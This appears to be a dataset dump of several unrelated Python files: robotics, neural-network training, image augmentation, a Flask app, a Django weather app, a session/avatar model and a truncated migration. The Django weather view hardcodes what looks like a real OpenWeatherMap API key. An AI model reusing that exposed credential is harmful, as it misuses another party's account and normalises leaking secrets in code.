\\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n f.write(\"GO\\n\")\n\n # Place gripper above pyramid position\n joint_variables, phi = ik.inverse_kinematics(pyramid_coordinates[pyramid_index][0], pyramid_coordinates[pyramid_index][1], 20 + pyramid_coordinates[pyramid_index][2])\n phi = np.rad2deg(phi)\n joint_variables[4] = np.deg2rad(90)\n\n print(\"\\nPlace gripper above pyramid position.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n\n pyramid_index += 1\n\ncv2.namedWindow('Processed Image', cv2.WINDOW_NORMAL)\ncv2.resizeWindow('Processed Image', 885, 420)\ncv2.imshow('Processed Image', processed_snap)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nprint(\"Ordered circles: {}\".format(ordered_circles))\nprint(\"Unreachable circles: {}\".format(unreachable_circles))\n","sub_path":"ee236/project3/rvm1_picknplace.py","file_name":"rvm1_picknplace.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"504911606","text":"# diff_evolution.py\n# Defines the differential evolution algorithm for learning a neural network.\n\nimport math\nimport numpy as np\nimport random as rd\nimport src.util.activations as af\nfrom src.network import Network\nfrom src.data import *\nfrom functools import reduce\n\n\n# DE is a population based optimizer that perturbs vectors using scaled differences of randomly generated\n# individual vectors\nclass DiffEvolution:\n # Creates an instance of the differential evolution (DE) algorithm. The DE trains the given network according to the\n # given parameters.\n # * network: the network object to train. (fitness function / objective function)\n # * pop_size: the size of the population; the number of particles.\n # * mutationF: the coefficient influencing how much to bias amount of mutation occurring.\n # * recombinationC: the coefficient influencing how much cross over occurs between the individual and mutant.\n def __init__(self, network: Network, mutation_f: float, recombination_c: float, pop_size=30):\n self.network = network # Minimize the objective function by optimizing the values of the network weights\n self.mutationF = mutation_f # Mutation rate\n self.recombinationC = recombination_c # Recombination rate\n self.population_size = pop_size\n self.individual_feature_size = self.network.get_num_weights() # Individuals features\n self.population = self.initialize_population() # Initialize Population\n self.run_nn_on_pop_weights()\n self.test_pop = self.population # used so we can compare old weights with new weights\n self.run()\n\n def run_nn_on_pop_weights(self):\n \"\"\"Uncomment for testing\"\"\"\n # fitness = []\n # cnt = 0\n # for individual in self.population:\n # print(individual)\n # print(self.get_fitness(individual))\n # fitness.append(self.get_fitness(individual))\n # cnt += 1\n # print(fitness)\n pass\n\n def initialize_population(self):\n \"\"\"Initialize Population by randomly selecting feature values for each individual within the population.\"\"\"\n bounds = -2000, 2000\n population = []\n for individual in range(self.population_size):\n individual = np.random.uniform(low=bounds[0], high=bounds[1],\n size=self.individual_feature_size) # Create Individual\n population.append(individual) # Add individual to population\n return population\n\n def mutation(self, loc):\n \"\"\"Mutation is used to allow us to explore our space to find a good solution. To do this we select three\n individuals at random from the current population. We then perform mutation and creating our mutant\"\"\"\n # Get random index's of the population were going changing\n mutation_idx = rd.sample(range(0, len(self.population)-1), 3)\n first_chosen_one = np.asarray(self.population[mutation_idx[0]])\n second_chosen_one = np.asarray(self.population[mutation_idx[1]])\n third_chosen_one = np.asarray(self.population[mutation_idx[2]])\n mutant = first_chosen_one + self.mutationF * (second_chosen_one - third_chosen_one)\n return mutant\n\n def recombination(self, loc, mutant):\n \"\"\"Perform crossover on each of our features within an individual\"\"\"\n for i in range(self.individual_feature_size):\n we_do_replace = random.uniform(0, 1) > self.recombinationC\n if we_do_replace:\n self.test_pop[loc][i] = mutant[i]\n\n def run(self):\n \"\"\"Runs the differential evolution optimization on each individual and finds the most fit individual within\n the space.\"\"\"\n iteration = 20\n best_performance = 0\n best_individual = []\n for i in range(iteration): # For i amt of iterations\n for loc in range(len(self.population) - 1): # For each individual\n mutant = self.mutation(loc) # Mutate\n individual = self.population[loc]\n self.recombination(loc, mutant) # Perform crossover\n old_performance = self.get_fitness(individual)\n test_pop_individual = self.test_pop[loc] # Test with new weights\n new_performance = self.get_fitness(test_pop_individual)\n\n if new_performance > best_performance:\n best_performance = new_performance\n best_individual = self.test_pop[loc]\n\n if old_performance < new_performance: # if performance better we replace the population with the mutant\n self.network.weights = self.encode(self.test_pop[loc]) # These weights were better\n self.population = self.test_pop # Lets update population to reflect this\n self.network.weights = self.encode(best_individual)\n\n def encode(self, individual):\n \"\"\"Encodes a vector into matrices that represent the Feed Forward Neural Network\"\"\"\n weights = []\n i = 0\n for shape in self.network.get_weight_shapes():\n size = reduce((lambda x, y: x * y), shape)\n weights.append(np.reshape(individual[i:i + size], shape))\n i += size\n return weights\n\n # Returns the fitness of the individuals current state.\n # The fitness is evaluated on the training set for the network.\n # The fitness is accuracy if a classification problem, and the inverse error for regression.\n def get_fitness(self, individual):\n \"\"\"Determine the fitness of an individual\"\"\"\n old_weights = self.network.weights\n self.network.weights = self.encode(individual)\n if self.network.is_regression():\n fitness = 1 / self.network.get_error(self.network.training_data)\n else:\n fitness = self.network.get_accuracy(self.network.training_data)\n self.network.weights = old_weights\n return fitness\n","sub_path":"src/training/diff_evolution.py","file_name":"diff_evolution.py","file_ext":"py","file_size_in_byte":5965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"483831925","text":"import os\nimport torch\nimport numpy as np\nimport cv2\nimport random\n\ndef getMaxThread(image):\n \"\"\"\n # 如果没有归一化到0,1则像素最大值设为255\n \"\"\"\n if image.max() > 10:\n maxthread = 255\n else:\n maxthread = 1\n return maxthread\n\n\nclass RandomCrop(object):\n \"\"\"Crop randomly the image in a sample.\n\n Args:\n \n \"\"\"\n\n def __init__(self ):\n pass\n\n def __call__(self, sample):\n\n image, annots = sample['img'], sample['annot']\n\n h,w,c = image.shape\n \n annots[:,2] = annots[:,2] + annots[:,0]\n annots[:,3] = annots[:,3] + annots[:,1]\n # 将目标最大边界找出\n xmin = max(annots[:,0].min()-10,0)\n ymin = max(annots[:,1].min()-10,0)\n xmax = min(annots[:,2].max()+10,w)\n ymax = min(annots[:,3].max()+10,h)\n \n top = np.random.randint(0,int(ymin//2))\n bottom = np.random.randint(int((h-ymax)//2+ymax),h)\n left = np.random.randint(0,int(xmin//2))\n right = np.random.randint(int((w-xmax)//2+xmax),w)\n \n # 使得长宽相同,之后缩放不会拉伸\n max_size = max(bottom - top,right - left)\n bottom = top + max_size\n right = left + max_size\n \n print([top,bottom,left,right])\n image = image[top: bottom,left: right]\n\n annots[:,2] = annots[:,2] - annots[:,0]\n annots[:,3] = annots[:,3] - annots[:,1]\n print(annots)\n annots[:,:2] = annots[:,:2] - [left,top]\n print(annots)\n return {'img': image, 'annot': annots}\n\n\nclass RandomFlip(object):\n def __call__(self, sample):\n image, annots = sample['img'], sample['annot']\n if random.random()<0.5:\n image = cv2.flip(image,1)\n annots[:,0] = image.shape[1]-annots[:,0] - annots[:,2]\n if random.random()<0.5:\n image = cv2.flip(image,0)\n annots[:,1] = image.shape[1]-annots[:,1] - annots[:,3]\n\n return {'img': image, 'annot': annots}\n\n\nclass RandomGaussianBlur(object):\n def __init__(self, p=0.5):\n self.p = p\n def __call__(self, sample):\n\n image, annots = sample['img'], sample['annot']\n if random.random() < self.p:\n image = cv2.GaussianBlur(image,(15,15),0)\n return {'img': image, 'annot': annots}\n\n\nclass RandomSwap(object):\n \"\"\"\n # 随机变换通道\n \"\"\"\n def __call__(self, sample):\n image, annots = sample['img'], sample['annot']\n perms = ((0, 1, 2), (0, 2, 1),\n (1, 0, 2), (1, 2, 0),\n (2, 0, 1), (2, 1, 0))\n if random.random() < 0.5:\n swap = perms[random.randrange(0, len(perms))]\n image = image[:, :, swap]\n return {'img': image, 'annot': annots}\n\n\nclass RandomContrast(object):\n \"\"\"\n # 随机变换对比度\n \"\"\"\n def __init__(self, lower=0.5, upper=1.5):\n self.lower = lower\n self.upper = upper\n def __call__(self, sample): \n image, annots = sample['img'], sample['annot']\n if random.random() < 0.5:\n # image = image.astype(np.float32).copy()\n maxthread = getMaxThread(image)\n alpha = random.uniform(self.lower, self.upper)\n image *= alpha\n image = image.clip(min=0, max=maxthread)\n return {'img': image, 'annot': annots}\n\n\nclass RandomSaturation(object):\n \"\"\"\n # 随机变换饱和度\n \"\"\"\n def __init__(self, lower=0.5, upper=1.5):\n self.lower = lower\n self.upper = upper\n def __call__(self, sample): \n image, annots = sample['img'], sample['annot'] \n if random.random() < 1.5:\n # image = image.astype(np.float32).copy()\n rotate = random.uniform(self.lower, self.upper)\n print(rotate)\n c = random.randint(0,2)\n maxthread = getMaxThread(image)\n image[:, :, c] = np.clip(image[:, :, c] * rotate,0,maxthread)\n return {'img': image, 'annot': annots}\n\n\n### not use\nclass RandomHue(object):\n\n def __init__(self, delta=90/255):\n self.delta = delta\n\n # 随机变换色度(HSV空间下(-180, 180))\n def __call__(self, sample): \n image, annots = sample['img'], sample['annot'] \n if random.random() < 0.5:\n maxthread = getMaxThread(image)\n self.delta *= maxthread\n # image = image.astype(np.float32).copy()\n image[:, :, 0] = np.clip(image[:, :, 0] + random.uniform(-self.delta, self.delta),0,maxthread)\n return {'img': image, 'annot': annots} ","sub_path":"efficientdet/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"477540980","text":"import torch.nn as nn\nimport torch\nimport sys\nimport os\nimport collections\nfrom torchvision import models\nimport torch.utils.model_zoo as model_zoo\nfrom l2norm import L2Norm\nimport torch.nn.functional as F\n\nmodel_urls = {\n 'vgg11': 'https://download.pytorch.org/models/vgg11-bbd30ac9.pth',\n 'vgg13': 'https://download.pytorch.org/models/vgg13-c768596a.pth',\n 'vgg16': 'https://download.pytorch.org/models/vgg16-397923af.pth',\n 'vgg19': 'https://download.pytorch.org/models/vgg19-dcbb9e9d.pth',\n 'vgg11_bn': 'https://download.pytorch.org/models/vgg11_bn-6002323d.pth',\n 'vgg13_bn': 'https://download.pytorch.org/models/vgg13_bn-abd245e5.pth',\n 'vgg16_bn': 'https://download.pytorch.org/models/vgg16_bn-6c64b313.pth',\n 'vgg19_bn': 'https://download.pytorch.org/models/vgg19_bn-c79401a0.pth',\n}\n\nclass PyramidFeatures(nn.Module):\n def __init__(self, C3_size, C4_size,feature_size=512):\n super(PyramidFeatures, self).__init__()\n # upsample C4 to get P4 from the FPN paper\n self.P4 = nn.Conv2d(C4_size, feature_size, kernel_size=1, stride=1, padding=0)\n self.P4_upsampled = nn.Upsample(scale_factor=2, mode='nearest')\n # add P4 elementwise to C3\n self.P3_1 = nn.Conv2d(C3_size, feature_size, kernel_size=1, stride=1, padding=0)\n self.P3_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=1, padding=1)\n\n def forward(self, inputs):\n C3, C4 = inputs\n\n P4_x = self.P4(C4)\n P4_upsampled_x = self.P4_upsampled(P4_x)\n\n P3_x = self.P3_1(C3)\n P3_x = P3_x + P4_upsampled_x\n P3_x = self.P3_2(P3_x)\n return P3_x\n\nclass CSRNet(nn.Module):\n def __init__(self, load_weights=False):\n super(CSRNet, self).__init__()\n self.frontend_feat = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512]\n self.backend_feat = [512, 512, 512,256,128,64]\n self.frontend = make_layers(self.frontend_feat)\n self.backend = make_layers(self.backend_feat,in_channels = 512,dilation = True)\n self.feature_map = nn.Conv2d(64,1,kernel_size=3,padding=1)\n self.seg_map = nn.Conv2d(64,4,kernel_size=3,padding=1)\n self.output_layer = nn.Conv2d(1, 1, kernel_size=1)\n self.relu = nn.ReLU(inplace=True)\n self.softmax = nn.Softmax2d()\n # self.conv_out = nn.Conv2d(1,1,kernel_size=3,padding=1)\n # self.L2Norm4_3 = L2Norm(512,8) \n # if not load_weights:\n # mod = models.vgg16(pretrained=True)\n # self._initialize_weights()\n # fsd = collections.OrderedDict()\n # # 10 convlution *(weight, bias) = 20 parameters\n # for i in range(len(self.frontend.state_dict().items())):\n # temp_key = list(self.frontend.state_dict().items())[i][0]\n # fsd[temp_key] = list(mod.state_dict().items())[i][1]\n # self.frontend.load_state_dict(fsd)\n \n # def forward(self,x):\n # s = list()\n # for j in range(23):\n # x = self.frontend[j](x)\n # if j == 15:\n # x = self.L2Norm3_3(x)\n # s.append(x)\n # x = self.L2Norm4_3(x)\n # s.append(x)\n # x = self.fpn(s)\n # x = self.backend(x)\n # x = self.output_layer(x)\n # x = F.interpolate(x,scale_factor=4)\n # return x.squeeze_(1)\n def forward(self,x):\n x = self.frontend(x)\n x = self.backend(x)\n sm = self.seg_map(x)\n sm = self.softmax(sm)\n fm = self.feature_map(x)\n max_conf, _ = torch.max(sm, dim=1, keepdim=True)\n x = torch.mul(fm,max_conf)\n x = self.output_layer(x)\n x = self.relu(x)\n x = F.interpolate(x,scale_factor=8)#, mode='bilinear')\n # x = self.conv_out(x)\n # x = self.relu(x)\n return x.squeeze_(1)\n\n # def _initialize_weights(self):\n # for m in self.modules():\n # if isinstance(m, nn.Conv2d):\n # nn.init.normal_(m.weight, std=0.01)\n # #nn.init.xavier_uniform_(m.weight)\n # if m.bias is not None:\n # nn.init.constant_(m.bias, 0)\n # elif isinstance(m, nn.BatchNorm2d):\n # nn.init.constant_(m.weight, 1)\n # nn.init.constant_(m.bias, 0)\n \n # def load_weights(self,base_file):\n # other, ext = os.path.splitext(base_file)\n # if ext == '.pkl' or '.pth':\n # print('Loading weights into state dict...')\n # mdata = torch.load(base_file,map_location=self.device)\n # epoch=1\n # self.load_state_dict(mdata)\n # print('Finished!')\n # else:\n # print('Sorry only .pth and .pkl files supported.')\n # return epoch\n\n # def load_vgg_weights(self):\n # print(\"Loading vgg16 weights ...\")\n # #mod = models.vgg16(pretrained = True)\n # #mod.state_dict().items()[i][1].data[:]\n # self._initialize_weights()\n # #iters = vgg_state_dict.items()\n # self.frontend.load_state_dict(model_zoo.load_url(model_urls['vgg16'], model_dir='.'), strict=False)\n # # for i in range(len(self.frontend.state_dict().items())):\n # # self.frontend.state_dict().items()[i][1].data[:] = iters[i][1].data[:]\n # print(\"Finished load weights\")\n\ndef make_layers(cfg, in_channels = 3,batch_norm=False,dilation = False):\n if dilation:\n d_rate = 2\n else:\n d_rate = 1\n layers = []\n for v in cfg:\n if v == 'M':\n layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n else:\n conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=d_rate,dilation = d_rate)\n if batch_norm:\n layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]\n else:\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = v\n return nn.Sequential(*layers)\n\n\nif __name__=='__main__':\n net = CSRNet()\n ina = torch.ones([1,3,112,112])\n x1 = net(ina)\n print(x1.size())","sub_path":"src/networks/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"373589825","text":"import os\n\nfrom flask import Flask, flash, jsonify, redirect, render_template, request, url_for\n\n\n\nUPLOAD_FOLDER = '/uploads'\nALLOWED_EXTENSIONS = set(['xls','xlsx','xlsm'])\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n app.config.from_mapping(\n SECRET_KEY='dev',\n DATABASE=os.path.join(app.instance_path, 'webapp.db'),\n )\n from . import upload\n app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n from . import db\n db.init_app(app)\n\n from . import auth\n app.register_blueprint(auth.bp)\n #app.add_url_rule('/',endpoint='index')\n\n from . import upload\n app.register_blueprint(upload.bp)\n\n try:\n dir = os.path.dirname(__file__)\n os.makedirs(app.instance_path)\n except OSError:\n pass\n \n @app.route('/index')\n def test():\n return render_template('index.html')\n\n return app","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"52260142","text":"from django.shortcuts import render, redirect, HttpResponse\nimport requests\nfrom home.models import City\nfrom datetime import datetime\n\n\n# Create your views here.\n\ndef index(request):\n url='http://api.openweathermap.org/data/2.5/weather?q={}&units=metric&appid=e09dd0b214c71258c57a8720e48712e8'\n if request.method=='POST':\n a=requests.get(url.format(request.POST.get('newcity')))\n print(a)\n if a.status_code==200:\n City(name=request.POST.get('newcity'), dt=datetime.today()).save()\n\n queryset=City.objects.all()\n allcitydata=[]\n for city in queryset:\n res=requests.get(url.format(city)).json()\n cityweather={\n 'id':city.id,\n 'city':res['name'],\n 'temp':res['main']['temp'],\n 'desc':res['weather'][0]['description'],\n 'icon':res['weather'][0]['icon']\n }\n allcitydata.append(cityweather)\n\n allcitydata.reverse()\n context={'cw':allcitydata, 'l':len(allcitydata)}\n return render(request, 'index.html', context)\n\n\ndef delcity(request, cid):\n City.objects.filter(id=cid).delete()\n return redirect('/')","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"142992939","text":"empty_dict = {}\n\nthis_is_dict = {'key': 'value'}\nnested_dict = {\n 'people': {\n 'Nikita': 1,\n 'Sveta': 2,\n 'Stepan': 0,\n }\n}\n\n\n# Be careful!\nthis_is_set = {'key', 'value'}\nprint(this_is_set == this_is_dict)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# DICTS ARE MUTABLE!\nvar = {1: 'value'}\nvar.update({2: 'new value'})\nprint(var)\n\n\nvar[1] = 'mutated value'\nprint(var)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# operations with dicts:\n\n# add:\nhero = {}\nhero.update({'name': 'Super Mario'})\nprint(hero)\n\n# get:\nprint(hero['name'])\nprint(hero.get('job', 'plumber'))\n\n# get only keys:\nprint(this_is_dict.keys())\n\n# get only values:\nprint(this_is_dict.values())\n\n# remove:\ntest_dict = {'pop-by-key': 1}\npopped = test_dict.pop('pop-by-key')\nprint(popped)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# iterate:\nto_iterate = {1: 'x2', 2: 'x4', 3: 'x8'}\nfor key in to_iterate:\n print(key, to_iterate[key])\n\nfor key, value in to_iterate.items():\n print(key, value)\n\n","sub_path":"Школа Х5/Урок 2/types/dicts.py","file_name":"dicts.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"551169225","text":"\"\"\"Tools for parsing OUTCAR files.\"\"\"\n\n\nclass OutcarParser(object):\n \"\"\"parse OUTCAR into a dictionary, which is supposed to be turned into ParameterData later.\"\"\"\n\n def __init__(self, fname):\n super(OutcarParser, self).__init__()\n self.outcar_file = fname\n self.properties = ['volume', 'free_energy', 'free_energy_all', 'energy_without_entropy', 'energy_without_entropy_all', 'efermi']\n self._cached_data = {}\n\n @property\n def output_dict(self):\n \"\"\"Parse the OUTCAR file and return the parsed values wrapped in a dictionary\"\"\"\n output_dict = {}\n for property_name in self.properties:\n # _get_quantity returns a dictionary containing the property if parsing has been successful.\n output_dict.update(self._get_quantity(property_name))\n return output_dict\n\n def _parse_outcar(self):\n \"\"\"Parse the OUTCAR file into a dictionary.\"\"\"\n result = {}\n energy_free = []\n energy_zero = []\n with open(self.outcar_file, 'r') as outcar_file_object:\n for line in outcar_file_object:\n # volume\n if line.rfind('volume of cell :') > -1:\n result['volume'] = float(line.split()[-1])\n # Free energy\n if line.lower().startswith(' free energy toten'):\n energy_free.append(float(line.split()[-2]))\n # Extrapolated zero point energy\n if line.startswith(' energy without entropy'):\n energy_zero.append(float(line.split()[-1]))\n # Fermi energy\n if line.rfind('E-fermi') > -1:\n result['efermi'] = float(line.split()[2])\n result['free_energy'] = energy_free[-1]\n result['energy_without_entropy'] = energy_zero[-1]\n result['free_energy_all'] = energy_free\n result['energy_without_entropy_all'] = energy_zero\n return result\n\n def _get_quantity(self, quantity):\n \"\"\"Return the requested quantity from the _cached_data. If OUTCAR has not been parsed yet, parse it.\"\"\"\n if not self._cached_data:\n self._cached_data = self._parse_outcar()\n\n if quantity not in self._cached_data:\n return {}\n\n return {quantity: self._cached_data[quantity]}\n","sub_path":"aiida_vasp/io/outcar.py","file_name":"outcar.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"542058700","text":"import time\nimport random\nfrom datetime import datetime\n\nfrom storm.locals import *\n\nfrom twisted.python.hashlib import md5\nfrom twisted.python import components\n\nfrom warp import runtime\nfrom warp.common.schema import stormSchema\n\n# Default session lang\nDEFAULT_LANG = u'en_US'\n\n@stormSchema.versioned\nclass Avatar(Storm):\n __version__ = \"warp_1\"\n __storm_table__ = \"warp_avatar\"\n\n id = Int(primary=True)\n email = Unicode()\n password = Unicode()\n\n _roles = None\n def _getRoles(self):\n if self._roles is None:\n roleLookup = runtime.config['roles']\n avatar_roles = runtime.avatar_store.find(\n AvatarRole, AvatarRole.avatar == self).order_by(AvatarRole.position)\n self._roles = tuple(\n [roleLookup[ar.role_name] for ar in avatar_roles if ar.role_name in roleLookup] +\n [roleLookup[r] for r in runtime.config['defaultRoles']]\n )\n\n return self._roles\n roles = property(_getRoles)\n\n def __repr__(self):\n return \"\" % self.email.encode(\"utf-8\")\n\n\n# Store flash messages\n_MESSAGES = {}\n\ndef nowstamp():\n return int(time.mktime(datetime.utcnow().timetuple()))\n\nclass Session(components.Componentized):\n \"\"\"\n Base interface for session.\n\n @ivar uid: A unique identifier for the session (GUID), C{bytes}\n\n @ivar isPersistent: Whether session is persistent, i.e. not subject to\n session inactivity timeout, C{bool}\n @ivar touched: Time when session was last used, seconds since epoch, C{integer}\n\n @ivar language: ISO locale code, e.g. en_US, C{bytes}\n\n @ivar avatar_id: Avatar id\n @ivar avatar: Avatar object instance\n\n This implements methods and properties from C{twisted.web.server.Session},\n and C{DBSession}. It doesn't implement session timeouts or require a database.\n \"\"\"\n language = DEFAULT_LANG\n isPersistent = False\n\n # sessionTimeout = 900\n\n # Don't update session age if it is less than this\n # _touch_granularity = 10\n\n # Class variable which stores flash messages\n _MESSAGES = {}\n\n def __init__(self, uid):\n \"\"\"\n Initialize a session with a unique ID.\n\n @param uid: Unique identifier for session, GUID.\n @type uid: C{bytes}\n \"\"\"\n components.Componentized.__init__(self)\n\n self.uid = uid\n self.touch()\n\n self.avatar_id = None\n self.avatar = None\n\n def addFlashMessage(self, msg, *args, **kwargs):\n \"\"\"\n Add flash message to session.\n\n These are messages which should be displayed to the user for a single\n page load, e.g. to indicate that an action has succeeded.\n \"\"\"\n if self.uid not in self._MESSAGES:\n self._MESSAGES[self.uid] = []\n self._MESSAGES[self.uid].append((msg, args, kwargs))\n\n def getFlashMessages(self, clear=True):\n \"\"\"\n Get flash messages for session.\n\n @param clear: Whether to clear messages after reading, default True\n @type clear: C{bool}\n \"\"\"\n if self.uid not in self._MESSAGES:\n return []\n messages = self._MESSAGES[self.uid][:]\n if clear:\n del self._MESSAGES[self.uid]\n return messages\n\n\n def hasAvatar(self):\n return self.avatar_id is not None\n\n def setAvatarID(self, avatar_id):\n \"\"\"\n Set avatar_id for session.\n\n Set to None when session is no longer valid.\n\n @param avatar_id: Integer id of avatar.\n @type avatar_id: C{integer}\n \"\"\"\n self.avatar_id = avatar_id\n\n\n def setPersistent(self, is_persistent):\n \"\"\"\n @param is_persistent: Set whether session is persistent.\n @type is_peristent: C{bool}\n \"\"\"\n self.isPersistent = is_persistent\n\n\n def age(self):\n \"\"\"\n @return Time since session was used in seconds.\n @rtype C{integer}\n \"\"\"\n return nowstamp() - self.touched\n\n def touch(self):\n \"\"\"\n Indicate that the session has been used.\n\n This is used to extend the session inactivity timeout.\n \"\"\"\n self.touched = nowstamp()\n # Optimization to prevent multiple updates in a short period of time\n # if self.age() > self._touch_granularity:\n # self.touched = nowstamp()\n\n def __repr__(self):\n return \"\" % self.uid\n\n\nclass SessionManagerBase(object):\n \"\"\"\n Base interface for SessionManager implementations.\n \"\"\"\n counter = 0\n sessions = {}\n\n def createSession(self):\n \"\"\"\n Generate a new Session instance.\n\n @return: Session object\n \"\"\"\n uid = self._mkuid()\n session = self.sessions[uid] = Session(uid)\n return session\n\n def getSession(self, uid):\n \"\"\"\n Get a previously generated session by its unique ID.\n\n This raises a KeyError if the session is not found.\n\n @type uid: string\n @param uid: Unique id for session.\n\n @return: Session object\n \"\"\"\n return self.sessions[uid]\n\n def _mkuid(self):\n \"\"\"\n Create uid.\n \"\"\"\n self.counter = self.counter + 1\n return md5(\"%s_%s\" % (str(random.random()), str(self.counter))).hexdigest()\n\nclass SessionManager(object):\n \"\"\"\n Handle sessions using database.\n \"\"\"\n counter = 0\n\n def createSession(self):\n \"\"\"\n Create initial session.\n\n @return: Session object\n \"\"\"\n uid = self._mkuid()\n session = DBSession()\n session.uid = uid\n runtime.avatar_store.add(session)\n runtime.avatar_store.commit()\n return session\n\n def getSession(self, uid):\n \"\"\"\n Get session matching uid.\n\n @type uid: string\n @param uid: Unique id for session.\n\n @return: Session object\n \"\"\"\n return runtime.avatar_store.get(DBSession, uid)\n\n def _mkuid(self):\n \"\"\"\n Create uid.\n \"\"\"\n self.counter = self.counter + 1\n return md5(\"%s_%s\" % (str(random.random()), str(self.counter))).hexdigest()\n\n\n@stormSchema.versioned\nclass DBSession(Storm):\n # FIXME HXP: This breaks integration with MySQL and SQLite, but those are\n # not working anyway due to the missing touched column.\n __version__ = \"hxp_2\"\n __storm_table__ = \"warp_session\"\n\n uid = RawStr(primary=True)\n avatar_id = Int()\n avatar = Reference(avatar_id, Avatar.id)\n touched = Int(default_factory=nowstamp)\n\n isPersistent = Bool(default=False)\n\n language = u\"en_US\"\n messages = None\n afterLogin = None\n\n _touch_granularity = 10\n\n def __storm_loaded__(self):\n if self.language is None:\n self.language = u\"en_US\"\n if self.touched is None:\n self.touched = nowstamp()\n runtime.avatar_store.commit()\n\n\n def addFlashMessage(self, msg, *args, **kwargs):\n \"\"\"\n Add flash message to session.\n\n These are messages which should be displayed to the user for a single\n page load, e.g. to indicate that an action has succeeded.\n \"\"\"\n if self.uid not in _MESSAGES:\n _MESSAGES[self.uid] = []\n _MESSAGES[self.uid].append((msg, args, kwargs))\n\n def getFlashMessages(self, clear=True):\n \"\"\"\n Get flash messages for session.\n\n @type clear: C{boolean}\n @param clear: Whether to clear messages after reading, default True\n \"\"\"\n if self.uid not in _MESSAGES:\n return []\n messages = _MESSAGES[self.uid][:]\n if clear:\n del _MESSAGES[self.uid]\n return messages\n\n\n def hasAvatar(self):\n return self.avatar_id is not None\n\n def setAvatarID(self, avatar_id):\n self.avatar_id = avatar_id\n runtime.avatar_store.commit()\n\n\n def setPersistent(self, is_persistent):\n self.isPersistent = is_persistent\n runtime.avatar_store.commit()\n\n def age(self):\n return nowstamp() - self.touched\n\n def touch(self):\n if self.age() > self._touch_granularity:\n self.touched = nowstamp()\n runtime.avatar_store.commit()\n\n def __repr__(self):\n return \"\" % self.uid\n\n# ---------------------------\n\n@stormSchema.versioned\nclass AvatarRole(Storm):\n __version__ = \"warp_1\"\n __storm_table__ = \"warp_avatar_role\"\n\n id = Int(primary=True)\n avatar_id = Int()\n avatar = Reference(avatar_id, \"Avatar.id\")\n role_name = RawStr()\n position = Int()\n","sub_path":"warp/common/avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":8551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"631223947","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Action',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('name', models.CharField(max_length=128)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Book',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('name', models.CharField(max_length=100)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='DishType',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('name_type', models.CharField(max_length=100)),\n ('parent', models.ForeignKey(to='recipes.DishType')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Ingredient',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('name', models.CharField(max_length=100)),\n ('note', models.CharField(max_length=1000)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Dish',\n fields=[\n ('ingredient_ptr', models.OneToOneField(serialize=False, to='recipes.Ingredient', primary_key=True, auto_created=True, parent_link=True)),\n ('verbose_name', models.CharField(max_length=100)),\n ('description', models.CharField(max_length=1000)),\n ('photo', models.ImageField(blank=True, null=True, upload_to='')),\n ('book', models.ManyToManyField(to='recipes.Book')),\n ('type', models.ForeignKey(to='recipes.DishType')),\n ],\n options={\n },\n 